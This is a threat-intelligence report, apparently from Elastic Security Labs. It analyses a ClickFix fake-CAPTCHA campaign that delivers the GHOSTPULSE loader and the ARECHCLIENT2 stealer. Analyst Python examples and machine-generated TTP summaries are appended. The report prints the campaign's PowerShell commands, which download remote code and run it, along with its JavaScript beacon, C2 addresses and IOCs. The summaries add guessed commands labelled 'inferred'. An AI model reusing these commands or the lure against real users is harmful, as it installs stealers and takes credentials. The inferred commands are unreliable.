A Wretch Client: From ClickFix deception to information stealer deployment

  • ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
  • Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
  • Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
  • Original: All text extracted from PDF

Original Text

A Wretch Client: From ClickFix deception to information stealer deployment — Elastic Security Labs

Salim Bitam

Preamble

Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.

Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.

This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.

Key takeaways

  • ClickFix: Remains a highly effective and prevalent initial access method.
  • GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.
  • ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.

The Initial Hook: Deconstructing ClickFix's Social Engineering

Every successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix. ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise.

[Figure: Fake captcha]

At its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on their systems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised as browser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, the user is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operating system's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.

ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024 and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users develop of mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users, conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial access vector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.

Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malware deployment, further underscoring its versatility and widespread adoption in the threat landscape.

Our internal telemetry at Elastic corroborates this trend, showing a significant volume of ClickFix-related alerts across our observed environments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focus on the deployment of mass infection malware, such as RATs and InfoStealers.

A ClickFix Campaign's Journey to ARECHCLIENT2

The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly shows this progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access, the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loader then brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2 (SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineering with hidden loader capabilities and multiple execution layers, ultimately to steal data and gain remote control.

[Figure: Execution flow]

We observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of its components.

[Figure: Execution flow in Kibana]

Technical analysis of the infection

The infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification. We observed two infrastructures (both resolving to 50.57.243[.]90), https://clients[.]dealeronlinemarketing[.]com/captcha/ and https://clients[.]contology[.]com/captcha/, that deliver the same initial payload. User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has been closely tracking this loader, and our previous research (2023 and 2024) provided a detailed look into its initial capabilities.

[Figure: Fake captcha hosted by contology[.]com]

The webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command to the clipboard.

[Figure: Obfuscated JavaScript of the captcha page]

Inspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on the checkbox Verify you are human.

[Figure: HTML code of the captcha page]

A simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easily identify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine by querying https://api.ipify[.]org?format=json, then sends the IP address to the attacker's infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.

[Figure: JavaScript of the captcha page]

The second function copies a base64-encoded PowerShell command to the clipboard.

[Figure: Command copied to the clipboard by the JavaScript script]

[Figure: PowerShell command copied to the clipboard]

Decoded from base64, the command is the following:

    (Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content | iex

When executed, it fetches the following PowerShell script:

    Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"

The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: after the user executes the PowerShell command copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file (ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.

Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads the malicious DLL. The file Heeschamjet.rc is the IDAT file that contains the next stage's payloads in an encrypted format, and the file Shonomteak.bxi is encrypted and used by the loader to fetch stage 2 and the configuration structure.

[Figure: Content of ComponentStyle.zip]

GHOSTPULSE

Stage 1

GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encrypted payload in an image by embedding the payload in the PNG's pixels, as detailed in Elastic's 2024 research blog post, and new modules from Zscaler research.

The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, it decrypts the file using a DWORD addition operation with a value stored in the file itself.

[Figure: Decryption of Shonomteak.bxi file]

The malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a library loaded using the LoadLibraryA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.

The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration that was inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case.

[Figure: Structure used in stage 2]

Stage 2

When the boolean field b_detect_process is set to True, the malware executes a function that checks a list of processes to see if they are running. If a process is detected, execution is delayed by 5 seconds.

[Figure: Delays execution by 5 seconds]

In previous samples we analyzed, GHOSTPULSE had its configuration hardcoded directly in the binary. This sample, on the other hand, has all the necessary information required for the malware to function properly stored in Shonomteak.bxi, including:

  • Hashes for the DLL names and Windows APIs
  • IDAT tag: used to find the start of the encrypted data in the PNG file
  • IDAT string: which is simply "IDAT"
  • Hashes of processes to scan for

[Figure: API fetching hashes stored in GHOSTPULSE configuration rather than hardcoded]

Final thoughts on GHOSTPULSE

GHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new method we discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options for compiling new samples.

Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find the updated tool in our labs-releases repository.

[Figure: Payload extraction from the GHOSTPULSE sample]

ARECHCLIENT2

In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote access tool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE through the ClickFix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2 around 2023.

The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in turn loads ARECHCLIENT2. The loader goes through 3 steps:

  • Patching AMSI
  • Extracting and decrypting the payload
  • Loading the CLR, then reflectively loading ARECHCLIENT2

[Figure: Main entry of the .NET loader]

Interestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API; for example, when failing to find the .tls section, an error message box with the string "D1" is displayed.

[Figure: Debugging/error messages through a message box]

The following is a table of all the error messages and their description:

Message   Description
F1        LoadLibraryExW hooking failed
F2        AMSI patching failed
D1        Unable to find .tls section
W2        Failed to load CLR

The malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook on AmsiScanBuffer, effectively bypassing AMSI.

[Figure: Hooking LoadLibraryExW]

After this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve as the XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts.

[Figure: Payload decryption routine]

Finally, it loads the .NET Common Language Runtime (CLR) in memory with the CLRCreateInstance Windows API before reflectively loading ARECHCLIENT2. The following is an example of how it is performed.

ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and system information. The malware's core objectives primarily focus on:

  • Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, and autofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam.

[Figure: DNSPY view of the StealerSettingConfigParce class]

  • System Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version, hardware information, IP address, machine name, and geolocation (city, country, and time zone).

[Figure: DNSPY view of ScanResult class]

  • Command Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackers remote control over infected systems.

The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and also retrieves its secondary C2 IP (143.110.230[.]167) from a hardcoded pastebin link, https://pastebin[.]com/raw/Wg8DHh2x.

[Figure: ARECHCLIENT2 configuration from DNSPY]

Infrastructure analysis

The malicious captcha page was hosted under two domains, clients.dealeronlinemarketing[.]com and clients.contology[.]com, under the URIs /captcha and /Client, pointing to the IP address 50.57.243[.]90.

We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals that the company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes. We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existing infrastructure and advertising reach to facilitate widespread malicious activity.

Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additional campaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.

Pivoting on a shared banner hash (@ValidinLLC's HOST-BANNER_0_HASH, which is the hash value of the web server response banners) revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeled by various other vendors as "Sectop RAT" (aka ARECHCLIENT2), as documented in the maltrail repo.

[Figure: ARECHCLIENT2 C2 Server Profile, courtesy @censysio]

The service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operating system. This suggests a reverse proxy of the C2 to protect the actual C2 team server by maintaining disposable front-end redirectors.

ARECHCLIENT2 IOC:

  • HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20

This is an active campaign, and this infrastructure has been built and torn down at a high cadence over the last seven months.
As of publication, the following C2 nodes are still active:

Value             First Seen   Last Seen
66.63.187.22      2025-06-15   2025-06-15
45.94.47.164      2025-06-02   2025-06-15
84.200.17.129     2025-06-04   2025-06-15
82.117.255.225    2025-03-14   2025-06-15
45.77.154.115     2025-06-05   2025-06-15
144.172.94.120    2025-05-20   2025-06-15
79.124.62.10      2025-05-15   2025-06-15
82.117.242.178    2025-03-14   2025-06-15
195.82.147.132    2025-04-10   2025-06-15
62.60.247.154     2025-05-18   2025-06-15
91.199.163.74     2025-04-03   2025-06-15
172.86.72.81      2025-03-13   2025-06-15
107.189.24.67     2025-06-02   2025-06-15
143.110.230.167   2025-06-08   2025-06-15
185.156.72.80     2025-05-15   2025-06-15
85.158.110.179    2025-05-11   2025-06-15
144.172.101.228   2025-05-13   2025-06-15
192.124.178.244   2025-06-01   2025-06-15
107.189.18.56     2025-04-27   2025-06-15
194.87.29.62      2025-05-18   2025-06-15
185.156.72.63     2025-06-12   2025-06-12
193.149.176.31    2025-06-08   2025-06-12

[Figure: ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLC]

Performing focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community members have previously labeled all 13 as Sectop RAT C2.

All these servers have similar configurations:

  • Running Canonical Linux
  • SSH on 22
  • Unknown TCP on 443
  • Nginx HTTP on 8080, and
  • HTTP on 9000 (C2 port)

Value             First Seen   Last Seen
45.141.87.249     2025-06-12   2025-06-12
176.126.163.56    2025-05-06   2025-06-12
185.156.72.71     2025-05-15   2025-06-12
91.184.242.37     2025-05-15   2025-06-12
45.141.86.159     2025-05-15   2025-06-12
67.220.72.124     2025-06-05   2025-06-12
45.118.248.29     2025-01-28   2025-06-12
172.105.148.233   2025-06-03   2025-06-10
194.26.27.10      2025-05-06   2025-06-10
45.141.87.212     2025-06-08   2025-06-08
45.141.86.149     2025-05-15   2025-06-08
172.235.190.176   2025-06-08   2025-06-08
45.141.86.82      2024-12-13   2025-06-08
45.141.87.7       2025-05-13   2025-06-06
185.125.50.140    2025-04-06   2025-06-03

Conclusion

This multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader to deliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chain gathers extensive credential, financial, and system data, while also granting attackers remote control over compromised machines.

MITRE ATT&CK

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.

  • Initial Access
  • Execution
  • Defense Evasion
  • Command and Control
  • Collection

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

  • Phishing
  • Spearphishing Link
  • User Execution
  • Malicious Link
  • Malicious File
  • Command and Scripting Interpreter
  • PowerShell
  • Deobfuscation/Decoding
  • DLL Sideloading
  • Reflective Loading
  • User Interaction
  • Ingress Tool Transfer
  • System Information Discovery
  • Process Discovery
  • Steal Web Session Cookie

Detecting [malware]

Detection

Elastic Defend detects this threat with the following behavior protection rules:

  • Suspicious Command Shell Execution via Windows Run
  • DNS Query to Suspicious Top Level Domain
  • Library Load of a File Written by a Signed Binary Proxy
  • Connection to WebService by a Signed Binary Proxy
  • Potential Browser Information Discovery

YARA

  • Windows_Trojan_GhostPulse
  • Windows_Trojan_Arechclient2

Observations

The following observables were discussed in this research.

Observable                                                          Type        Name                      Reference
clients.dealeronlinemarketing[.]com                                 domain                                Captcha subdomain
clients.contology[.]com                                             domain                                Captcha subdomain
koonenmagaziner[.]click                                             domain
50.57.243[.]90                                                      ipv4-addr                             clients.dealeronlinemarketing[.]com & clients.contology[.]com IP address
144.172.97[.]2                                                      ipv4-addr                             ARECHCLIENT2 C&C server
143.110.230[.]167                                                   ipv4-addr                             ARECHCLIENT2 C&C server
pastebin[.]com/raw/Wg8DHh2x                                         ipv4-addr                             Contains ARECHCLIENT2 C&C server IP
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a    SHA-256     DivXDownloadManager.dll   GHOSTPULSE
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90    SHA-256     Heeschamjiet.rc           PNG GHOSTPULSE
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55    SHA-256                               DOTNET LOADER
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9    SHA-256                               ARECHCLIENT2

References

The following were referenced throughout the above research:

  • https://x.com/SI_FalconTeam/status/1915790796948643929
  • https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics
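For the GHOSTPULSE stage 1 description above (Shonomteak.bxi decrypted with a DWORD addition whose operand is stored in the file, the library name then read from the decrypted data), here is an added Python sketch of the analyst-side inverse. It is not Elastic's configuration extractor nor the malware's code: the container layout (key in the first DWORD, then a NUL-terminated library name, then the rest of the body) is an assumption made for this example, and the sample blob is constructed inside the block.

```python
import struct

# Assumed container layout for this example (NOT GHOSTPULSE's verified format):
#   bytes 0..3 : the 32-bit value the loader adds to every DWORD of the body
#   bytes 4..  : the encrypted body, a whole number of little-endian DWORDs
KEY_OFFSET = 0
BODY_OFFSET = 4


def dword_add_transform(data, key, encrypt=False):
    """Add `key` to every little-endian DWORD mod 2**32 (the loader's operation);
    with encrypt=True subtract it instead, which is the inverse used to build samples."""
    if len(data) % 4:
        raise ValueError("body must be a multiple of 4 bytes")
    count = len(data) // 4
    words = struct.unpack("<%dI" % count, data)
    delta = -key if encrypt else key
    out = [(w + delta) & 0xFFFFFFFF for w in words]
    return struct.pack("<%dI" % count, *out)


def decrypt_container(blob):
    """Read the in-file key and undo the DWORD addition over the body."""
    key = struct.unpack_from("<I", blob, KEY_OFFSET)[0]
    return dword_add_transform(blob[BODY_OFFSET:], key)


def parse_stage1_config(decrypted):
    """Illustrative parse of the decrypted body (assumed layout): a NUL-terminated
    library name to load (e.g. vssapi.dll in the post), followed by the stage 2 bytes."""
    name, _, rest = decrypted.partition(b"\0")
    return name.decode("ascii"), rest


def build_sample_container(plaintext, key):
    """Constructed test input: pad to a DWORD boundary, encrypt with the inverse
    operation and prepend the key, mimicking the assumed on-disk layout."""
    padded = plaintext + b"\0" * (-len(plaintext) % 4)
    return struct.pack("<I", key) + dword_add_transform(padded, key, encrypt=True)


if __name__ == "__main__":
    sample = build_sample_container(b"vssapi.dll\0STAGE2-CODE", 0x1337BEEF)
    lib, stage2 = parse_stage1_config(decrypt_container(sample))
    print(lib, stage2.rstrip(b"\0"))
```

Because the operand is a plain 32-bit addition, the same routine with `encrypt=True` produces test vectors, which is how the constructed sample above is built; for real samples the key offset and the field order behind it would come from the loader's own parsing routine.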
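The stage 2 configuration above carries an IDAT tag used to find the start of the encrypted data in the PNG file, and the Final thoughts on GHOSTPULSE section notes the extractor handles this IDAT-header method. Locating that data needs only a PNG chunk walk, shown here as an added example (not the labs-releases extractor): the tag value, the payload bytes and the PNG itself are constructed inside the block, and the assumption that the encrypted data immediately follows the tag in the concatenated IDAT stream is the example's own.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def iter_png_chunks(png):
    """Yield (type, data) for every chunk: 4-byte big-endian length, 4-byte type, data, 4-byte CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack_from(">I4s", png, pos)
        data = png[pos + 8:pos + 8 + length]
        yield ctype, data
        pos += 12 + length  # length + type + data + crc


def find_tagged_payload(png, tag):
    """Concatenate all IDAT data (as a decoder would) and return the bytes that follow
    the configured tag, i.e. the encrypted stage. None when the tag is absent."""
    idat = b"".join(data for ctype, data in iter_png_chunks(png) if ctype == b"IDAT")
    off = idat.find(tag)
    if off < 0:
        return None
    return idat[off + len(tag):]


def _chunk(ctype, data):
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_sample_png(tag, payload):
    """Constructed carrier: a valid 1x1 RGB image whose compressed pixel stream is split
    across two IDAT chunks, with tag + payload appended inside the second one."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, RGB, ...
    pixels = zlib.compress(b"\x00\xff\x00\x00")           # filter byte + one red pixel
    return (PNG_SIG
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", pixels[:5])
            + _chunk(b"IDAT", pixels[5:] + tag + payload)
            + _chunk(b"IEND", b""))


if __name__ == "__main__":
    tag = b"\xde\xad\xbe\xef"  # constructed tag value, not from any real configuration
    carrier = build_sample_png(tag, b"ENCRYPTED-STAGE")
    print([t for t, _ in iter_png_chunks(carrier)], find_tagged_payload(carrier, tag))
```

Walking chunks by their length field, rather than searching the file for the ASCII string "IDAT", matters because the tag or the ciphertext could itself contain those four bytes; with the chunk table in hand the same walker also exposes the pixel data needed for the 2024 pixel-embedding variant.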
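The .NET loader section above describes the payload location: the loader parses the PE headers to find the .tls section, takes its first 0x40 bytes as the XOR key and decrypts the remainder into the ARECHCLIENT2 sample. The following added example (not the loader's code nor an Elastic tool) does that from the analyst side with a minimal PE section-table parser; that the 0x40-byte key repeats cyclically over the ciphertext is an assumption made here, and the PE image used as input is constructed inside the block.

```python
import struct

KEY_LEN = 0x40  # first 0x40 bytes of .tls serve as the key, per the post


def pe_sections(pe):
    """Parse the COFF section table and yield (name, raw_offset, raw_size) per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt  # section headers follow the optional header
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size


def decrypt_tls_payload(pe):
    """Return the decrypted payload carried in .tls, or None when the section is
    missing (the case the loader reports with its 'D1' message box)."""
    for name, off, size in pe_sections(pe):
        if name == ".tls":
            section = pe[off:off + size]
            key, body = section[:KEY_LEN], section[KEY_LEN:]
            # Assumption: repeating-key XOR, key = first KEY_LEN bytes of the section.
            return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(body))
    return None


def build_sample_pe(key, payload):
    """Constructed minimal x86 PE: DOS stub, PE signature, COFF header with no optional
    header, a .text entry and a .tls entry whose raw data is key + XOR-encrypted payload."""
    assert len(key) == KEY_LEN
    e_lfanew, tls_off = 0x40, 0x200
    enc = bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(payload))
    text_off = tls_off + KEY_LEN + len(enc)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections=2, SizeOfOptionalHeader=0, Characteristics=EXE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)

    def section(name, raw_off, raw_size):
        return struct.pack("<8sIIII", name, raw_size, 0x1000, raw_size, raw_off) + b"\0" * 16

    headers = (dos + b"PE\0\0" + coff
               + section(b".text", text_off, 4)
               + section(b".tls", tls_off, KEY_LEN + len(enc)))
    return headers.ljust(tls_off, b"\0") + key + enc + b"\xC3\0\0\0"


if __name__ == "__main__":
    sample = build_sample_pe(bytes(range(KEY_LEN)), b"MZ-placeholder-dotnet-payload")
    print(decrypt_tls_payload(sample))
```

Reading SizeOfOptionalHeader instead of assuming a PE32 or PE32+ layout keeps the parser correct for either bitness; the constructed image sets it to zero, which is not something a real linker emits but is enough to exercise the section walk.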
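For the ClickFix execution chain (a base64-encoded PowerShell command pasted into the run dialog, fetching a script that is piped to iex) and the rule names listed under Detection, here is an added example of the shape such detection logic takes: decode the encoded PowerShell argument, flag a download-and-execute cradle whose shell was spawned by explorer.exe (the process behind the Run dialog), and flag DNS lookups to a watch-listed TLD such as .click. The events, the TLD list and the rule logic are constructed for this example; they approximate the two rule names quoted from the post and are not Elastic Defend's actual rules.

```python
import base64
import re


def build_sample_events():
    """Constructed sample telemetry (not from the original post), shaped loosely
    like endpoint process-creation and DNS events."""
    # Same shape as the clipboard command in the post: a download cradle piped to iex.
    # The URL is a placeholder, not the campaign's.
    cradle = "(Invoke-WebRequest -URI 'https://example.invalid/x' -UseBasicParsing).content | iex"
    encoded = base64.b64encode(cradle.encode("utf-16le")).decode("ascii")
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        # ClickFix shape: the Run dialog (hosted by explorer.exe) spawns PowerShell with an encoded cradle.
        {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": ps,
         "cmdline": f"powershell -w hidden -enc {encoded}"},
        # Benign: PowerShell from a console, no cradle.
        {"type": "process", "parent": r"C:\Windows\System32\cmd.exe", "image": ps,
         "cmdline": "powershell -Command Get-Process"},
        # DNS: a lookup to a suspicious TLD (placeholder name) and an ordinary one.
        {"type": "dns", "image": ps, "query": "counter-placeholder.click"},
        {"type": "dns", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
         "query": "www.example.com"},
    ]


ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
CRADLE_FETCH = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadstring|net\.webclient|\bcurl\b|\bwget\b", re.I)
SUSPICIOUS_TLDS = {"click", "top", "xyz", "shop"}  # constructed watch-list, not Elastic's
SHELLS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE (what PowerShell expects), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_download_cradle(text):
    """True when the text both fetches remote content and hands it to an expression evaluator."""
    return bool(CRADLE_EXEC.search(text) and CRADLE_FETCH.search(text))


def analyze_events(events):
    """Approximations of the two rule names quoted in the post, evaluated over sample events."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            decoded = decode_encoded_command(ev["cmdline"])
            effective = ev["cmdline"] + ("\n" + decoded if decoded else "")
            from_run_dialog = ev["parent"].lower().endswith("\\explorer.exe")
            if from_run_dialog and ev["image"].lower().endswith(SHELLS) and is_download_cradle(effective):
                findings.append({"rule": "Suspicious Command Shell Execution via Windows Run",
                                 "image": ev["image"], "decoded": decoded})
        elif ev["type"] == "dns":
            tld = ev["query"].rsplit(".", 1)[-1].lower()
            if tld in SUSPICIOUS_TLDS:
                findings.append({"rule": "DNS Query to Suspicious Top Level Domain",
                                 "image": ev["image"], "query": ev["query"]})
    return findings


if __name__ == "__main__":
    for finding in analyze_events(build_sample_events()):
        print(finding)
```

Decoding the encoded argument before matching is the part that matters for ClickFix: the cradle keywords never appear in the raw command line, so a rule that inspects only the visible arguments sees nothing but an opaque base64 blob.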

Original Text ChatGPT 4o Paged


Model: gpt-4o

Phase: Initial Access

  • Technique: ClickFix Social Engineering
  • Procedure: Users are deceived into copying and pasting malicious PowerShell commands, which results in malware execution.

Phase: Execution

  • Technique: PowerShell Execution
  • Procedure: Likely use of PowerShell commands for executing payloads due to ClickFix. A probable command might involve bypassing execution policies:
  • Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "<MaliciousCommand>"

Phase: Delivery

  • Technique: Multi-Stage Payload with GHOSTPULSE
  • Procedure: Deployment of the GHOSTPULSE loader, which serves as a multi-stage payload delivery system.

Phase: Malware Deployment

  • Technique: Deployment of Information Stealers
  • Procedure: Following the execution, the GHOSTPULSE loader installs infostealers such as LUMMA and ARECHCLIENT2 to exfiltrate data.

Phase: Evasion

  • Technique: Encrypted Configuration
  • Procedure: GHOSTPULSE uses an encrypted file to store its initial configuration, enhancing evasion from detection mechanisms.


Model: gpt-4o

Phase: Initial Access

  • Technique: Social Engineering via ClickFix
  • Procedure: User is tricked into copying and pasting a malicious PowerShell command into the operating system's run dialog.

Phase: Execution

  • Technique: PowerShell Execution
  • Command (inferred): powershell -ExecutionPolicy Bypass -NoProfile -Command "<malicious command>"

Phase: Delivery of Payload

  • Technique: Process Injection with GHOSTPULSE Loader
  • Procedure: After initial access, the GHOSTPULSE Loader is deployed to introduce an intermediate .NET loader.

Phase: Payload Deployment

  • Technique: Memory Injection
  • Procedure: The intermediate .NET loader delivers the ARECHCLIENT2 (SECTOPRAT) sample, which is loaded directly into memory.

Phase: Impact

  • Technique: Remote Access and Data Exfiltration
  • Procedure: The final payload allows adversaries to steal data and gain remote control of the system.

This attack chain demonstrates the use of social engineering combined with multi-stage execution to effectively bypass defenses and execute malware.


Model: gpt-4o

Phase: Initial Access

  • Technique: Phishing Page with Fake Captcha
  • Procedure: The attacker sets up a phishing page imitating a Cloudflare DDoS captcha page. User interaction with this page serves as the initial trigger for the attack.

Phase: Execution

  • Technique: PowerShell Execution via Clipboard
  • Procedure: A heavily obfuscated JavaScript script on the phishing page generates HTML and JavaScript code that copies a PowerShell command to the user's clipboard.

Likely Command (inferred):

  • Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <Base64 Payload>

Malware Loader

  • Tool: GHOSTPULSE
  • Technique: Malware Loading
  • Procedure: GHOSTPULSE is used as the loader for the initial payload delivered through the phishing page.

(Note: The report did not provide explicit details beyond the points mentioned, limiting inference without further data on specific command usage.)


Model: gpt-4o

Phase: Execution

  • Technique: JavaScript Execution for Data Exfiltration
  • Procedure: The function runClickedCheckboxEffects retrieves the public IP address by querying https://api.ipify.org?format=json and sends the IP to https://koonenmagaziner.click/counter/<IP_address> to log the infection.

Phase: Execution

  • Technique: Clipboard Data Injection
  • Procedure: Copies a base64-encoded PowerShell command to the clipboard for potential execution by pasting it into a PowerShell terminal.

Inferred Command (likely based on behavior described)

  • Technique: PowerShell Execution via Clipboard
  • Command (likely): powershell -EncodedCommand <Base64 Payload>


Model: gpt-4o

Phase: Execution

  • Technique: PowerShell Execution
